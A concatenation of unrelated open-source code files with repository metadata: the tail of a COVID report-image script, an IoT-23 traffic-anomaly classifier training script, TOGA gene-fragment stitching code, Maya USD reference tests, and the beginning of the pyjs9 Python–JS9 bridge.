draw.text( (380,760), 'Active Cases : '+str(totalKerala['confirmed']-totalKerala['recovered']-totalKerala['deceased']),(0,0,200), font=selectFont)
#Report Graph Pasteing
tot=image_paste('total cases.png', 80, 1020)#Confirmed cases
img=tot
rec=image_paste('recoveries.png', 1210, 1020)#Recoveries
img=rec
det=image_paste('total deaths.png', 80, 1820)#Deaths
img=det
act=image_paste('active cases.png', 1210, 1820)#Active
act.save('report_'+str(date)+'.png')
| 2.375 | 2 |
src/utils/run_step04_train_models.py | Iretha/IoT23-network-traffic-anomalies-classification | 9 | 12765005 | <filename>src/utils/run_step04_train_models.py
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import MinMaxScaler, StandardScaler
from sklearn.svm import LinearSVC
from sklearn.tree import DecisionTreeClassifier
from config import iot23_data_dir, iot23_experiments_dir
from src.iot23 import feature_selections, get_data_sample
from src.helpers.log_helper import add_logger
from src.helpers.experiments_helper import train_models
add_logger(file_name='04_train_models.log')
# Selected Data Files
data_file_dir = iot23_data_dir
data_samples = [
# get_data_sample(dataset_name='S16', rows_per_dataset_file=10_000), # ~ 1 min
get_data_sample(dataset_name='S04', rows_per_dataset_file=5_000_000),
get_data_sample(dataset_name='S16', rows_per_dataset_file=5_000_000),
]
# Selected Features
features = [
feature_selections['F14'],
feature_selections['F17'],
feature_selections['F18'],
feature_selections['F19'],
]
# Selected Algorithms
training_algorithms = dict([
('DecisionTree', Pipeline([('normalization', StandardScaler()), ('classifier', DecisionTreeClassifier())])), # 5 mil = 2 min
('GaussianNB', Pipeline([('normalization', StandardScaler()), ('classifier', GaussianNB())])), # 5 mil = 11 sec
('LogisticRegression', Pipeline([('normalization', StandardScaler()), ('classifier', LogisticRegression())])), # 5 mil = 20 min
('RandomForest', Pipeline([('normalization', StandardScaler()), ('classifier', RandomForestClassifier())])), # 5 mil = 60 min
('SVC_linear', Pipeline([('normalization', MinMaxScaler()), ('classifier', LinearSVC())])), # 5 mil = 60 min
# ('MLPClassifier', Pipeline([('normalization', MinMaxScaler()), ('classifier', MLPClassifier(hidden_layer_sizes=(15,), max_iter=1000))])), # 8.313 min
# ('AdaBoost', Pipeline([('normalization', MinMaxScaler()), ('classifier', AdaBoostClassifier(n_estimators=1000))])), # 5 mil = 2 min
# ('AdaBoost_Decision_Tree', Pipeline([('normalization', StandardScaler()), ('classifier', AdaBoostClassifier(DecisionTreeClassifier(max_depth=2), n_estimators=1000))])),
# ('GradientBoostingClassifier', Pipeline([('normalization', StandardScaler()), ('classifier', GradientBoostingClassifier())])), # 5 mil = 60 min
])
experiments_dir = iot23_experiments_dir
train_models(data_file_dir,
experiments_dir,
data_samples,
features,
training_algorithms,
overwrite=False)
print('Step 04: The end.')
quit()
| 2.15625 | 2 |
newStuff.py | mts5qd/cs3240-labdemo | 0 | 12765006 | <gh_stars>0
def main():
print(hi)
if __name__ == '__main__': main()
| 1.671875 | 2 |
modules/stitch_fragments.py | hillerlab/TOGA | 32 | 12765007 | #!/usr/bin/env python3
"""
Author: <NAME>.
Included in TOGA by <NAME>.
"""
import argparse
import sys
from datetime import datetime as dt
from collections import defaultdict
try:
from modules.common import make_cds_track
from modules.common import flatten
except ImportError:
from common import make_cds_track
from common import flatten
# artificial 0-scored points
SOURCE = "SOURCE"
SINK = "SINK"
SCORE_THRESHOLD = 0.5
EXON_COV_THRESHOLD = 1.33
MAX_OVERLAP = 60
class Vertex:
"""Graph vertex."""
def __init__(self, name, start, end, score):
self.name = name
self.start = start
self.end = end
self.score = score
self.children = list()
def add_child(self, v):
if v not in self.children:
self.children.append(v)
class Graph:
"""Build a directed graph using adjacency list."""
def __init__(self):
self.vertices = {}
def add_vertex(self, vertex):
"""Add vertex if it's not in the vertices list."""
if isinstance(vertex, Vertex) and vertex.name not in self.vertices:
self.vertices[vertex.name] = vertex
return True
else:
return False
def add_edge(self, parent, child):
"""Find vertices with parent and child names."""
if parent in self.vertices and child in self.vertices:
self.vertices[parent].add_child(child)
return True
else:
return False
def topological_sort_util(self, v, visited, stack):
"""Perform Depth First Search
Mark the current node as visited.
"""
visited[v] = True
# check all children of this vertex if they're visited
for i in self.vertices[v].children:
if visited[i] is False:
self.topological_sort_util(i, visited, stack)
# add current vertex to stack
stack.insert(0, v)
def topological_sort(self):
"""Perform topological sort.
Use recursive function topological_sort_util().
Mark all the vertices as not visited.
"""
visited = {v: False for v in self.vertices}
# initiate stack to store sorted vertices
stack = []
for vertex in self.vertices:
if visited[vertex] is False:
self.topological_sort_util(vertex, visited, stack)
# return sorted list of vertices
return stack
def __repr__(self):
lines = []
for elem in self.vertices.keys():
line = f"{elem}\t{self.vertices[elem].children}\n"
lines.append(line)
return "".join(lines)
def parse_args():
"""Parse CMD args."""
app = argparse.ArgumentParser()
app.add_argument("chain_file", help="Chain file")
app.add_argument(
"chain_scores_file", help="XGBoost output: chain orthology probabilities"
)
app.add_argument("bed_file", help="Bed file containing gene loci.")
app.add_argument(
"--only_fragmented",
"--of",
action="store_true",
dest="only_fragmented",
help="Output fragmented genes only.",
)
if len(sys.argv) < 3:
app.print_help()
sys.exit(0)
args = app.parse_args()
return args
def read_gene_scores(score_file):
"""Read orthology_score.tsv file into a dict.
Dict structure is:
{GENEid : [(chain, score), (chain2, score2), ..] }.
"""
ret = defaultdict(list)
f = open(score_file, "r")
f.__next__() # skip header
for line in f:
line_data = line.rstrip().split()
gene = line_data[0]
chain_id = int(line_data[1])
chain_score = float(line_data[2])
if chain_score < SCORE_THRESHOLD:
continue
item = (chain_id, chain_score)
ret[gene].append(item)
f.close()
return ret
def read_chain_file(chain_file):
"""Read chain file.
Create dict chain_id: (start, end)."""
ret = {}
f = open(chain_file, "r")
for line in f:
if not line.startswith("chain"):
continue
line_data = line.rstrip().split()
start = int(line_data[5])
end = int(line_data[6])
chain_id = int(line_data[12])
ret[chain_id] = (start, end)
f.close()
return ret
def read_gene_loci(bed_file):
"""For each bed entry get coding locus."""
# TODO: not the most optimal solution, fix it
ret = {}
f = open(bed_file, "r")
for line in f:
cds_line = make_cds_track(line).split("\t")
# extract absolute exon coordinates
chrom_start = int(cds_line[1])
name = cds_line[3]
if name.endswith("_CDS"):
name = name[:-4]
block_count = int(cds_line[9])
block_sizes = [int(x) for x in cds_line[10].split(",") if x != ""]
block_starts = [int(x) for x in cds_line[11].split(",") if x != ""]
block_ends = [block_starts[i] + block_sizes[i] for i in range(block_count)]
block_abs_starts = [block_starts[i] + chrom_start for i in range(block_count)]
block_abs_ends = [block_ends[i] + chrom_start for i in range(block_count)]
exon_nums = list(range(block_count))
exon_coords = list(zip(exon_nums, block_abs_starts, block_abs_ends))
ret[name] = exon_coords
f.close()
return ret
def build_chain_graph(chain_id_to_loc, intersecting_chains_wscores):
"""Build chain graph.
Read chains and corresponding scores into
a chain dictionary {chain: (start, end, score)}.
"""
chain_graph = Graph()
# add all vertices to the chain graph
for chain_id, score in intersecting_chains_wscores:
start, end = chain_id_to_loc.get(chain_id, (None, None))
if start is None:
raise ValueError(f"Cannot find chain {chain_id}")
v = Vertex(chain_id, start, end, -1 * score)
chain_graph.add_vertex(v)
# add edges to the chain graph
for i in chain_graph.vertices:
for j in chain_graph.vertices:
if i == j:
# no need to connect the point to itself
continue
i_vertex = chain_graph.vertices[i]
j_vertex = chain_graph.vertices[j]
# allow some overlap between chains
# defined in the MAX_OVERLAP constant
i_vertex_and_flank = i_vertex.end - MAX_OVERLAP
if i_vertex_and_flank <= j_vertex.start:
chain_graph.add_edge(i_vertex.name, j_vertex.name)
return chain_graph
def add_source_sink_graph(graph_name):
"""Add artificial Source and Sink vertices to the chain graph.
Assign them zero length and zero score.
"""
source_end = min(
[graph_name.vertices[vertex].start for vertex in graph_name.vertices]
)
source_start = source_end
sink_start = max(
[graph_name.vertices[vertex].end for vertex in graph_name.vertices]
)
sink_end = sink_start
graph_name.add_vertex(Vertex(SOURCE, source_start, source_end, 0))
graph_name.add_vertex(Vertex(SINK, sink_start, sink_end, 0))
# add edges from Source to each vertex
for vertex in graph_name.vertices:
if vertex != SOURCE:
graph_name.add_edge(SOURCE, vertex)
# add edges from each vertex to Sink
for vertex in graph_name.vertices:
if vertex != SINK:
graph_name.add_edge(vertex, SINK)
return # all
def find_shortest_path(graph_name, source, sink, sorted_vertices):
"""Find shortest path in directed acyclic graph.
Initiate dictionary with shortest paths to each node:
{vertex: (value, path itself)}.
"""
shortest_paths = {}
for sorted_vertex in sorted_vertices:
shortest_paths[sorted_vertex] = (0, [source])
# check each child of the current vertex
# and update shortest path to this vertex in the dictionary
for sorted_vertex in sorted_vertices:
children = graph_name.vertices[sorted_vertex].children
for child in children:
current_score = shortest_paths[child][0]
sp_sv_0 = shortest_paths[sorted_vertex][0]
gn_sv_s = graph_name.vertices[child].score
score_if_updated = sp_sv_0 + gn_sv_s
if score_if_updated < current_score:
new_path = list(shortest_paths[sorted_vertex][1])
if sorted_vertex not in new_path:
new_path.append(sorted_vertex)
shortest_paths[child] = (score_if_updated, new_path)
return shortest_paths[sink]
# def intersect(range_1, range_2):
# """Return intersection size."""
# return min(range_1[1], range_2[1]) - max(range_1[0], range_2[0])
def check_exon_coverage(chains, chain_id_to_loc, exons_loci):
"""For each chain check whether it intersects all gene exons."""
exon_num = len(exons_loci)
chain_id_coverage = {}
for chain_id in chains:
# for each chain create a bool list indicating what exon
# it intersects
# remove exons where end < chain_start
# and exon start > chain_end
chain_loc = chain_id_to_loc[chain_id]
intersect_exon_nums = [
x[0] for x in exons_loci if x[2] > chain_loc[0] and x[1] < chain_loc[1]
]
bool__exon_cov = [False for _ in range(exon_num)]
for i in intersect_exon_nums:
bool__exon_cov[i] = True
# bool__exon_cov = [intersect(e, chain_loc) > 0 for e in exons_loci]
chain_id_coverage[chain_id] = bool__exon_cov
return chain_id_coverage
def get_average_exon_cov(chain_to_exon_cov, exon_num):
"""Compute average exon coverage."""
exon_cov = [0 for _ in range(exon_num)]
for coverage in chain_to_exon_cov.values():
# there are bool values in coverage
# covert them to int such as True = 1 and False = 0
coverage_numeric = [1 if c else 0 for c in coverage]
for i in range(exon_num):
exon_cov[i] += coverage_numeric[i]
average_cov = sum(exon_cov) / exon_num
return average_cov
def stitch_scaffolds(chain_file, chain_scores_file, bed_file, fragments_only=False):
"""Stitch chains of fragmented orthologs."""
gene_score_dict = read_gene_scores(chain_scores_file)
# func read_chain_file returns data about all chains in the file
# however, we need only orthologous ones
# to avoid contamination with paralogous chains we further filter the
# chain_id_to_loc dictionary
# gene score dict: gene_id: [(chain, score), (chain, score), ...]
# Iterate over dict values (lists of tuples), get the 1st elem of each tuple (chain_id)
orth_chains = set(
flatten([v[0] for v in vals] for vals in gene_score_dict.values())
)
chain_id_to_loc__no_filt = read_chain_file(chain_file)
chain_id_to_loc = {
k: v for k, v in chain_id_to_loc__no_filt.items() if k in orth_chains
}
genes_to_exon_coords = read_gene_loci(bed_file)
gene_to_path = {}
task_size = len(gene_score_dict.keys())
count = 1
for gene, intersecting_chains_wscores in gene_score_dict.items():
if count % 500 == 0:
print(f"Processing gene: {count} / {task_size}", flush=True)
count += 1
if len(intersecting_chains_wscores) <= 1:
continue
# intersecting chains: list of tuples
# [(chain, score), (chain, score), ...]
# chains that intersect this gene
exon_coords = genes_to_exon_coords.get(gene)
if exon_coords is None:
# must never happen
raise ValueError(f"Cannot find a bed track for {gene}")
# extract some extra information about exon coverage
intersecting_chains = [x[0] for x in intersecting_chains_wscores]
chain_id_to_exon_cov = check_exon_coverage(
intersecting_chains, chain_id_to_loc, exon_coords
)
# for k, v in chain_id_to_exon_cov.items():
# print(k, v)
chain_id_covers_all = {
k: all(v for v in val) for k, val in chain_id_to_exon_cov.items()
}
if any(chain_id_covers_all.values()):
# if there is a chain that covers the gene entirely: skip this
continue
average_exon_coverage = get_average_exon_cov(
chain_id_to_exon_cov, len(exon_coords)
)
if average_exon_coverage > EXON_COV_THRESHOLD:
# skip if each exon is covered > EXON_COV_THRESHOLD times in average
continue
# Initiate chain graph
chain_graph = build_chain_graph(chain_id_to_loc, intersecting_chains_wscores)
add_source_sink_graph(chain_graph)
# Topologically sort chain graph
sorted_vertices = chain_graph.topological_sort()
# Find 'longest' (=highest scoring) path in the graph =
# find shortest path in the graph with negative scoring vertices.
longest_path_chain_graph = find_shortest_path(
chain_graph, SOURCE, SINK, sorted_vertices
)
_, _path = longest_path_chain_graph
path = _path[1:] # starts with [SOURCE, ... ]
if fragments_only and len(path) < 2:
# this gene is covered entirely by a single chain
continue
gene_to_path[gene] = path
del chain_graph
return gene_to_path
if __name__ == "__main__":
t0 = dt.now()
args = parse_args()
gene_to_path = stitch_scaffolds(
args.chain_file,
args.chain_scores_file,
args.bed_file,
fragments_only=args.only_fragmented,
)
# save output
for k, v in gene_to_path.items():
v_str = ",".join(map(str, v))
print(f"{k}\t{v_str}")
elapsed = dt.now() - t0
print(f"# Elapsed: {elapsed}")
| 2.609375 | 3 |
src/openprocurement/api/interfaces.py | EBRD-ProzorroSale/openprocurement.api | 102 | 12765008 | # -*- coding: utf-8 -*-
from zope.interface import Interface
class IOPContent(Interface):
""" Openprocurement Content """
class IContentConfigurator(Interface):
""" Content configurator """
| 1.421875 | 1 |
test/lib/mayaUsd/fileio/testAddMayaReference.py | sun-frog/maya-usd | 0 | 12765009 | <reponame>sun-frog/maya-usd
#!/usr/bin/env python
#
# Copyright 2022 Autodesk
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import fixturesUtils
import mayaUsd
import mayaUtils
from pxr import Tf, Usd, Kind
from maya import cmds
from maya import standalone
import mayaUsdAddMayaReference
import mayaUsdMayaReferenceUtils as mayaRefUtils
import os, unittest
class AddMayaReferenceTestCase(unittest.TestCase):
'''Test Add Maya Reference.
'''
pluginsLoaded = False
mayaSceneStr = None
stage = None
kDefaultNamespace = 'simpleSphere'
@classmethod
def setUpClass(cls):
fixturesUtils.setUpClass(__file__)
# Create a pure Maya scene to reference in.
import os
cls.mayaSceneStr = mayaUtils.createSingleSphereMayaScene(os.getcwd())
@classmethod
def tearDownClass(cls):
standalone.uninitialize()
def setUp(self):
# Start each test with a new scene with empty stage.
cmds.file(new=True, force=True)
import mayaUsd_createStageWithNewLayer
self.proxyShapePathStr = mayaUsd_createStageWithNewLayer.createStageWithNewLayer()
self.stage = mayaUsd.lib.GetPrim(self.proxyShapePathStr).GetStage()
def testDefault(self):
'''Test the default options for Add Maya Reference.
Add a Maya Reference using the defaults (no group or variant).
'''
kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
# Since this is a brand new prim, it should not have variant sets.
primTestDefault = self.stage.DefinePrim('/Test_Default', 'Xform')
primPathStr = self.proxyShapePathStr + ',/Test_Default'
self.assertFalse(primTestDefault.HasVariantSets())
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace)
# The prim should not have any variant set.
self.assertFalse(primTestDefault.HasVariantSets())
# Verify that a Maya Reference prim was created.
self.assertTrue(mayaRefPrim.IsValid())
self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
self.assertEqual(mayaRefPrim, primTestDefault.GetChild(kDefaultPrimName))
self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
# Test an error creating the Maya reference prim by disabling permission to edit on the
# edit target layer.
editTarget = self.stage.GetEditTarget()
editLayer = editTarget.GetLayer()
editLayer.SetPermissionToEdit(False)
badMayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
mayaReferencePrimName='BadMayaReference')
self.assertFalse(badMayaRefPrim.IsValid())
editLayer.SetPermissionToEdit(True)
def testDefineInVariant(self):
'''Test the "Define in Variant" options.
Add a Maya Reference with a (default) variant set.
'''
kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
kDefaultVariantSetName = mayaRefUtils.defaultVariantSetName()
kDefaultVariantName = mayaRefUtils.defaultVariantName()
# Create another prim with default variant set and name.
primTestVariant = self.stage.DefinePrim('/Test_Variant', 'Xform')
primPathStr = self.proxyShapePathStr + ',/Test_Variant'
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
variantSet=(kDefaultVariantSetName, kDefaultVariantName),
mayaAutoEdit=True)
# Make sure the prim has the variant set and variant.
self.assertTrue(primTestVariant.HasVariantSets())
vset = primTestVariant.GetVariantSet(kDefaultVariantSetName)
self.assertTrue(vset.IsValid())
self.assertEqual(vset.GetName(), kDefaultVariantSetName)
self.assertTrue(vset.GetVariantNames())
self.assertTrue(vset.HasAuthoredVariant(kDefaultVariantName))
self.assertEqual(vset.GetVariantSelection(), kDefaultVariantName)
# Verify that a Maya Reference prim was created.
self.assertTrue(mayaRefPrim.IsValid())
self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
self.assertEqual(mayaRefPrim, primTestVariant.GetChild(kDefaultPrimName))
self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
# Verify that the Maya reference prim is inside the variant,
# and that it has the expected metadata.
attr = mayaRefPrim.GetAttribute('mayaReference')
self.assertTrue(attr.IsValid())
self.assertTrue(os.path.samefile(attr.Get().resolvedPath, self.mayaSceneStr))
attr = mayaRefPrim.GetAttribute('mayaNamespace')
self.assertTrue(attr.IsValid())
self.assertEqual(attr.Get(), self.kDefaultNamespace)
attr = mayaRefPrim.GetAttribute('mayaAutoEdit')
self.assertTrue(attr.IsValid())
self.assertEqual(attr.Get(),True)
# Test an error creating the Variant Set by disabling permission to edit on the
# edit target layer.
editTarget = self.stage.GetEditTarget()
editLayer = editTarget.GetLayer()
editLayer.SetPermissionToEdit(False)
badMayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
mayaReferencePrimName='PrimVariantFail',
variantSet=('VariantFailSet', 'VariantNameFail'),
mayaAutoEdit=False)
self.assertFalse(badMayaRefPrim.IsValid())
editLayer.SetPermissionToEdit(True)
def testBadNames(self):
'''Test using bad prim and variant names.
Add a Maya Reference using a bad Maya Reference prim name and
bad Variant Set and Variant name.
'''
kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
# Create another prim to test sanitizing variant set and name.
primTestSanitizeVariant = self.stage.DefinePrim('/Test_SanitizeVariant', 'Xform')
primPathStr = self.proxyShapePathStr + ',/Test_SanitizeVariant'
kBadPrimName = ('3'+kDefaultPrimName+'$')
kGoodPrimName = Tf.MakeValidIdentifier(kBadPrimName)
kBadVariantSetName = 'No Spaces or Special#Chars'
kGoodVariantSetName = Tf.MakeValidIdentifier(kBadVariantSetName)
kBadVariantName = '3no start digits'
kGoodVariantName = Tf.MakeValidIdentifier(kBadVariantName)
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
mayaReferencePrimName=kBadPrimName,
variantSet=(kBadVariantSetName, kBadVariantName))
# Make sure the prim has the variant set and variant with
# the sanitized names.
self.assertTrue(primTestSanitizeVariant.HasVariantSets())
vset = primTestSanitizeVariant.GetVariantSet(kGoodVariantSetName)
self.assertTrue(vset.IsValid())
self.assertEqual(vset.GetName(), kGoodVariantSetName)
self.assertTrue(vset.GetVariantNames())
self.assertTrue(vset.HasAuthoredVariant(kGoodVariantName))
self.assertEqual(vset.GetVariantSelection(), kGoodVariantName)
# Verify that the prim was created with the good name.
self.assertTrue(mayaRefPrim.IsValid())
self.assertEqual(str(mayaRefPrim.GetName()), kGoodPrimName)
self.assertEqual(mayaRefPrim, primTestSanitizeVariant.GetChild(kGoodPrimName))
self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
# Adding a Maya Reference with the same name should produce an error.
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
mayaReferencePrimName=kGoodPrimName)
self.assertFalse(mayaRefPrim.IsValid())
def testGroup(self):
'''Test the "Group" options.
Add a Maya Reference using a group.
'''
kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
kDefaultVariantSetName = mayaRefUtils.defaultVariantSetName()
kDefaultVariantName = mayaRefUtils.defaultVariantName()
# Create another prim to test adding a group prim (with variant).
primTestGroup = self.stage.DefinePrim('/Test_Group', 'Xform')
primPathStr = self.proxyShapePathStr + ',/Test_Group'
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
groupPrim=('Xform', Kind.Tokens.group),
variantSet=(kDefaultVariantSetName, kDefaultVariantName))
# Make sure a group prim was created.
# Since we did not provide a group name, one will have been auto-generated for us.
# "namespace" + "RN" + "group"
primGroup = primTestGroup.GetChild(self.kDefaultNamespace+'RNgroup')
self.assertTrue(primGroup.IsValid())
self.assertTrue(primGroup.GetPrimTypeInfo().GetTypeName(), 'Xform')
model = Usd.ModelAPI(primGroup)
self.assertEqual(model.GetKind(), Kind.Tokens.group)
# Make sure the group prim has the variant set and variant.
self.assertTrue(primGroup.HasVariantSets())
vset = primGroup.GetVariantSet(kDefaultVariantSetName)
self.assertTrue(vset.IsValid())
self.assertEqual(vset.GetName(), kDefaultVariantSetName)
self.assertTrue(vset.GetVariantNames())
self.assertTrue(vset.HasAuthoredVariant(kDefaultVariantName))
self.assertEqual(vset.GetVariantSelection(), kDefaultVariantName)
# Verify that a Maya Reference prim was created under the new group prim.
self.assertTrue(mayaRefPrim.IsValid())
self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
self.assertEqual(mayaRefPrim, primGroup.GetChild(kDefaultPrimName))
self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
# Add another Maya reference with group, but name the group this time and
# use a 'Scope' prim instead.
kGroupName = 'NewGroup'
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
groupPrim=(kGroupName, 'Scope', Kind.Tokens.group))
# Make sure a group prim was created and what we named it.
prim2ndGroup = primTestGroup.GetChild(kGroupName)
self.assertTrue(prim2ndGroup.IsValid())
self.assertTrue(prim2ndGroup.GetPrimTypeInfo().GetTypeName(), 'Scope')
model = Usd.ModelAPI(prim2ndGroup)
self.assertEqual(model.GetKind(), Kind.Tokens.group)
# Verify that a Maya Reference prim was created under the new group prim.
self.assertTrue(mayaRefPrim.IsValid())
self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
self.assertEqual(mayaRefPrim, prim2ndGroup.GetChild(kDefaultPrimName))
self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
# Adding a group with the same name should produce an error.
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
groupPrim=(kGroupName, 'Scope', Kind.Tokens.group))
self.assertFalse(mayaRefPrim.IsValid())
# Test an error creating the group prim by disabling permission to edit on the edit target layer.
editTarget = self.stage.GetEditTarget()
editLayer = editTarget.GetLayer()
editLayer.SetPermissionToEdit(False)
badMayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
primPathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
groupPrim=('NoGroup', 'Xform', Kind.Tokens.group))
self.assertFalse(badMayaRefPrim.IsValid())
invalidGroupPrim = primTestGroup.GetChild('NoGroup')
self.assertFalse(invalidGroupPrim.IsValid())
editLayer.SetPermissionToEdit(True)
def testProxyShape(self):
'''Test adding a Maya Reference directly undereath the proxy shape.
Add a Maya Reference using the defaults (no group or variant).
'''
kDefaultPrimName = mayaRefUtils.defaultMayaReferencePrimName()
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
self.proxyShapePathStr,
self.mayaSceneStr,
self.kDefaultNamespace)
# Verify that a Maya Reference prim was created.
self.assertTrue(mayaRefPrim.IsValid())
self.assertEqual(str(mayaRefPrim.GetName()), kDefaultPrimName)
self.assertTrue(mayaRefPrim.GetPrimTypeInfo().GetTypeName(), 'MayaReference')
# We should get an error (invalid prim) when adding a Maya reference under
# the proxy shape when we also add a variant set.
kDefaultVariantSetName = mayaRefUtils.defaultVariantSetName()
kDefaultVariantName = mayaRefUtils.defaultVariantName()
mayaRefPrim = mayaUsdAddMayaReference.createMayaReferencePrim(
self.proxyShapePathStr,
self.mayaSceneStr,
self.kDefaultNamespace,
variantSet=(kDefaultVariantSetName, kDefaultVariantName))
self.assertFalse(mayaRefPrim.IsValid())
if __name__ == '__main__':
unittest.main(verbosity=2)
| 1.96875 | 2 |
pyjs9/__init__.py | ericmandel/pyjs9 | 14 | 12765010 | """
pyjs9.py: connects Python and JS9 via the JS9 (back-end) helper
"""
from __future__ import print_function
import time
import json
import base64
import logging
from traceback import format_exc
from threading import Condition
from io import BytesIO
import requests
__all__ = ['JS9', 'js9Globals']
"""
pyjs9.py connects Python and JS9 via the JS9 (back-end) helper
- The JS9 class constructor connects to a single JS9 instance in a web page.
- The JS9 object supports the JS9 Public API and a shorter command-line syntax.
- See: http://js9.si.edu/js9/help/publicapi.html
- Send/retrieve numpy arrays and astropy (or pyfits) hdulists to/from js9.
- Use python-socketio for fast, persistent connections to the JS9 back-end
"""
# pyjs9 version
__version__ = '3.6'
# try to be a little bit neat with global parameters
js9Globals = {}
js9Globals['version'] = __version__
# what sort of fits verification gets done on SetFITS() output?
# see astropy documentation on write method
js9Globals['output_verify'] = 'ignore'
# retrieve image data from JS9 as an array or as base64 encoded string
# in the early days, base64 seemed to be faster
# js9Globals['retrieveAs'] = 'base64'
# array allows us to deal with larger images
js9Globals['retrieveAs'] = 'array'
# load fits, if available
try:
from astropy.io import fits
js9Globals['fits'] = 1
except ImportError:
try:
import pyfits as fits
if fits.__version__ >= '2.2':
js9Globals['fits'] = 2
else:
js9Globals['fits'] = 0
except ImportError:
js9Globals['fits'] = 0
# load numpy, if available
try:
import numpy
js9Globals['numpy'] = 1
except ImportError:
js9Globals['numpy'] = 0
# load socket.io, if available
try:
import socketio
logging.info('set socketio transport')
js9Globals['transport'] = 'socketio'
js9Globals['wait'] = 10
except ImportError:
logging.info('no python-socketio, use html transport')
js9Globals['transport'] = 'html'
js9Globals['wait'] = 0
# utilities
def _decode_list(data):
rv = []
for item in data:
if isinstance(item, list):
item = _decode_list(item)
elif isinstance(item, dict):
item = _decode_dict(item)
rv.append(item)
return rv
def _decode_dict(data):
rv = {}
for key, value in data.items():
if isinstance(value, list):
value = _decode_list(value)
elif isinstance(value, dict):
value = _decode_dict(value)
rv[key] = value
return rv
# numpy-dependent routines
if js9Globals['numpy']:
def _bp2np(bitpix): # pylint: disable=too-many-return-statements
"""
Convert FITS bitpix to numpy datatype
"""
if bitpix == 8:
return numpy.uint8
if bitpix == 16:
return numpy.int16
if bitpix == 32:
return numpy.int32
if bitpix == 64:
return numpy.int64
if bitpix == -32:
return numpy.float32
if bitpix == -64:
return numpy.float64
if bitpix == -16:
return numpy.uint16
raise ValueError('unsupported bitpix: %d' % bitpix)
_NP_TYPE_MAP = (
# pylint: disable=bad-whitespace
(numpy.uint8 , numpy.uint8, ),
(numpy.int8 , numpy.int16, ),
(numpy.uint16 , numpy.uint16, ),
(numpy.int16 , numpy.int16, ),
(numpy.int32 , numpy.int32, ),
(numpy.uint32 , numpy.int64, ),
(numpy.int64 , numpy.int64, ),
(numpy.float16, numpy.float32,),
(numpy.float32, numpy.float32,),
(numpy.float64, numpy.float64,),
)
def _cvt2np(ndarr: numpy.ndarray):
# NOTE cvt2np may be merged into np2bp
dtype = ndarr.dtype
for t in _NP_TYPE_MAP:
if numpy.issubdtype(dtype, t[0]):
return ndarr.astype(t[1])
return ndarr
def _np2bp(dtype): # pylint: disable=too-many-return-statements
"""
Convert numpy datatype to FITS bitpix
"""
if dtype == numpy.uint8:
return 8
if dtype == numpy.int16:
return 16
if dtype == numpy.int32:
return 32
if dtype == numpy.int64:
return 64
if dtype == numpy.float32:
return -32
if dtype == numpy.float64:
return -64
if dtype == numpy.uint16:
return -16
raise ValueError('unsupported dtype: %s' % dtype)
def _bp2py(bitpix): # pylint: disable=too-many-return-statements
"""
Convert FITS bitpix to python datatype
"""
if bitpix == 8:
return 'B'
if bitpix == 16:
return 'h'
if bitpix == 32:
return 'l'
if bitpix == 64:
return 'q'
if bitpix == -32:
return 'f'
if bitpix == -64:
return 'd'
if bitpix == -16:
return 'H'
raise ValueError('unsupported bitpix: %d' % bitpix)
def _im2np(im):
"""
Convert GetImageData object to numpy
"""
w = int(im['width'])
h = int(im['height'])
d = 1
bp = int(im['bitpix'])
dtype = _bp2np(bp)
dlen = h * w * abs(bp) // 8
if js9Globals['retrieveAs'] == 'array':
s = im['data'][0:h*w]
if d > 1:
arr = numpy.array(s, dtype=dtype).reshape((d, h, w))
else:
arr = numpy.array(s, dtype=dtype).reshape((h, w))
elif js9Globals['retrieveAs'] == 'base64':
s = base64.decodebytes(im['data'].encode())[0:dlen]
if d > 1:
arr = numpy.frombuffer(s, dtype=dtype).reshape((d, h, w))
else:
arr = numpy.frombuffer(s, dtype=dtype).reshape((h, w))
else:
